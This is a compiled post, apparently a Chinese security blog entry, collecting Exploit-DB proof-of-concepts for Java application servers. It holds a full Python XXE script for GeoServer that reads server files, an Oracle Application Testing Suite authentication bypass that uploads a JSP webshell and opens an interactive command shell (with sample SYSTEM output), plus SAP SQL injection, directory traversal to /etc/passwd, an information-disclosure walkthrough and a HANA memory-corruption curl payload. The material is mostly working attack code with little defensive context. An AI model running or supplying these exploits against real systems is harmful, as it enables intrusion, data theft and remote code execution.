20160529整理到几个新的Java容器漏洞
Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit
# Exploit Title : GeoServer XXE# Date : 11/08/2015# Exploit Author : David Bloom (Script) - (Ping to Sven Claessens, Jacques Villemur and Eric Donners)# Vendor homepage : http://geoserver.org# Software Link : http://geoserver.org/release/stable# Version : 2.7 : <2.7.1.1 / 2.6 : <2.6.4 / 2.5 : <2.5.5.1 # Tested : Client Windows, Server Linux/Jetty # Vendor bug track : GEOS-7032# CVE : No CVE# Category : Webapps# Description : An XXE vulnerability in geoserver allows to view file contents and list directories on the server. from xml.etree import ElementTreeimport sysimport urllib2import urllib def main(): print '\n-----------------------\nGeoServer XXE Exploit\nScript by David Bloom\nTwitter: @philophobia78\n-----------------------\n' if len(sys.argv) != 3 : print "Usage geoserver-xxe.py [URL] [File Or Dir]" return geoServerUrl = sys.argv[1] fileName = sys.argv[2] featuresUrl = geoServerUrl + "/wfs?request=GetCapabilities" exploitUrl = geoServerUrl + "/wfs?request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%20%3C!DOCTYPE%20foo%20[%20%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F@targetFile@%22%20%3E]%3E%3CFilter%20%3E%3CPropertyIsEqualTo%3E%3CPropertyName%3E%26xxe%3B%3C%2FPropertyName%3E%3CLiteral%3EBrussels%3C%2FLiteral%3E%3C%2FPropertyIsEqualTo%3E%3C%2FFilter%3E" response = urllib2.urlopen(featuresUrl) root = ElementTree.fromstring(response.read()) print "Searching geoserver features ... : \n" gsFeatures = [] for node in root.iter(): if 'FeatureTypeList' in node.tag : for feature in node.iter(): if 'Name' in feature.tag : gsFeatures.append(feature.text) print "Feature found :" + feature.text if not gsFeatures: print "No geoserver feature found, wrong url ?" 
return print "\nCandidate used : " + gsFeatures[0] + "\n" print "Trying XXE : " print "-------------\n" exploitUrl = exploitUrl.replace("@candidateFeature@",gsFeatures[0]) exploitUrl = exploitUrl.replace("@targetFile@",fileName) print exploitUrl + "\n\n" try : response = urllib2.urlopen(exploitUrl) # Clean output from exceptions string trashOutput = response.read() beginRef = "Illegal property name:" endRef = "for feature type" fileStart = trashOutput.index(beginRef) + len(beginRef) fileStop = trashOutput.index(endRef) print "Output" print "-------\n" print trashOutput[fileStart:fileStop].strip() except : print "An error occured, maybe a premission error" if __name__ == '__main__': main()
Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit
import urllib2import urllib ip = '192.168.150.239'port = 8088 url = "http://" + ip + ":" + str(port)#bypass authenticationurl = url+"/olt/Login.do/../../olt/UploadFileUpload.do"request = urllib2.Request(url) webshell_content='''<%@ page import="java.util.*,java.io.*" %> <% if (request.getParameter("{cmd}") != null) {{ Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while (disr != null) {{ out.println(disr); disr = dis.readLine(); }} }} %>'''boundary = "---------------------------7e01e2240a1e"request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)post_data = "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"post_data = post_data + "\r\n.jsp\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"post_data = post_data + "\r\nwebshell.jsp\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"post_data = post_data + "\r\n\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"post_data = post_data + "\r\n\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"post_data = post_data + "\r\n\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"post_data = post_data + "\r\n*\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"post_data = post_data + "Content-Type: text/plain\r\n"post_data = post_data + "\r\n" + 
webshell_content +"\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"post_data = post_data + "\r\nDefault\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"post_data = post_data + "\r\n.\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"post_data = post_data + "--" + boundary + "--"+"\r\n" try: request.add_data(post_data) response = urllib2.urlopen(request) if response.code == 200 : print "[+]upload done!" webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" print "[+]wait a moment,detecting whether the webshell exists..." if urllib2.urlopen(webshellurl).code == 200 : print "[+]upload webshell successfully!" print "[+]return a cmd shell" while True: cmd = raw_input(">>: ") if cmd == "exit" : break print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() else: print "[-]attack fail!" else: print "[-]attack fail!"except Exception as e: print "[-]attack fail!" '''#run the exploit and get a cmd shellroot@kali:~/Desktop# python exploit.py [+]upload done![+]wait a moment,detecting whether the webshell exists...[+]upload webshell successfully![+]return a cmd shell>>: whoamint authority\system >>: exit'''
https://www.exploit-db.com/exploits/39840/
POST /XXX/UDDISecurityImplBean HTTP/1.1Content-Type: text/xml <SOAP-ENV:Envelopexmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"> XXX <permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or'1'='1</permissionId> XXX </SOAP-ENV:Envelope>
SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure
https://www.exploit-db.com/exploits/39841/ 1. Open http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#page on the SAP server. 2. Press the "Choose" button. 3. In the window that opens, press "Search". You will get a list of SAP users. 8. REPORT TIMELINE Sent: 15.09.2015 Reported: 15.09.2015 Vendor response: 16.09.2015 Date of Public Advisory: 09.02.2016
SAP xMII 15.0 - Directory Traversal
https://www.exploit-db.com/exploits/39837/PoC GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
SAP HANA 1.00.095 - hdbindexserver Memory Corruption
https://www.exploit-db.com/exploits/39382/Proof of concept This authentication request should be replayed 10 times. curl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H'X-csrf-token: unsafe' -d'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'